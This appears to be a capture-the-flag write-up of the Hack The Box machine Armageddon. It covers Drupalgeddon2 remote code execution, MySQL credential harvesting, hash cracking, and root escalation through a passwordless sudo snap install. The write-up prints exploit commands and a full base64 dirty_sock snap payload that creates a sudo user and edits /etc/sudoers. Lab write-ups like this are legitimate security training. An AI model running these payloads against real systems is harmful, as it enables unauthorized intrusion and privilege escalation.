Info

Armageddon is Linux-based easy machine, created by bertolis.

Enumeration

Let’s run network scan to check open ports and service versions.

Scanning Result

SSH and HTTP port are open. We should be able to visit page on 10.10.10.233.

Login Page

And yes, there is login page. Let’s explore this. On this page we can’t find anything interesting, but in source page and Wappalyzer…

Found Drupal Version
Wappalyzer Result

Exploitation

It was easy to discover it. Drupal 7.x has multiple vulnerabilities, including PHP object injection and remote code execution vulnerabilities. Let’s google it.

Drupalgeddon2 Exploit

This exploit name is actually very similar to Armageddon. Too easy if it’s correct one. Let’s git clone it and run it. It has very good explain how to use it, check it on GitHub here.

Downloading Exploit

Before running, make sure you have installed highline gem .

sudo gem install highline

And then run exploit.

./drupalgeddon2.rb http://10.10.10.233/
Getting Shell

And we got it. But there is not user.txt. It means we need more to explore.

User Escalation

Since we can’t use cd command, we need to manually explore it (ls /some/path or cat /some/path/file.txt).

Files

Interesting directory is sites, where we maybe can find credentials.

MySQL Credentials

And, we found it. Let’s connect to MySQL with these credentials. We can’t connect from our local machine, so, let’s login from shell we got. Since we can’t get actually MySQL shell, we will use Single MySQL Commands.

mysql -u [Username] -p[Password] -e "[Command to execute..]"
mysql -u drupaluser [email protected]*m23gBVj -e 'show databases'
Single MySQL Command

And we can see drupal database, let’s check tables.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'show tables'

And, users is there! Let’s check it.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'SELECT * FROM users'
Users

There is password hashes and usernames. First one, brucetherealadmin, has email added, [email protected] and that email is different from the other ones, so he might be main user. We will try to crack these hashes with john.

Cracked Password

I already did this machine, so I’ll just show the password john cracked earlier. Command for cracking is in image. Now, when we have credentials, let’s login. brucetherealadmin:booboo

User

Got user! Now, let’s own root.

Root Escalation

First, we’ll check sudo capabilities.

Sudo Capabilities

We can run snap install without using password! Great, we can find exploit to escalate privileges with snap. Let’s google it.

Results

We will check first one, named dirty_sock on GitHub. Clone it to your local machine.

Downloading Exploit

I tried to transfer both scripts on target machine, but it not worked. We need to install it on target machine manually. I was looking at scripts and found this in dirty_sockv2.py:

dirty_sockv2.py

So, we’ll copy this and print on target machine to .snap installation file, and we can install it on target system. We will use this command on target machine to make installation snap file:

python3 -c 'print("aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "==")' | base64 -d > installation.snap

And then,

sudo /usr/bin/snap install --devmode installation.snap

–devmode allows users to install snaps without enforcing security policies.

Installed

We will read README.md now to see how to use it.

README.md

Okay, so we need to become dirty_sock user. Let’s do this.

Changing User

Yay! We are dirty_sock! If you get error that user doesn’t exist, just reset the machine. I had same problem. Now, we will try to become root. Just type sudo su.

Root

Wooah, we got root! If it asks you for password, use dirty_sock as a password.

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord
Vasic

CTF Player | Penetration Tester | Ethical Hacker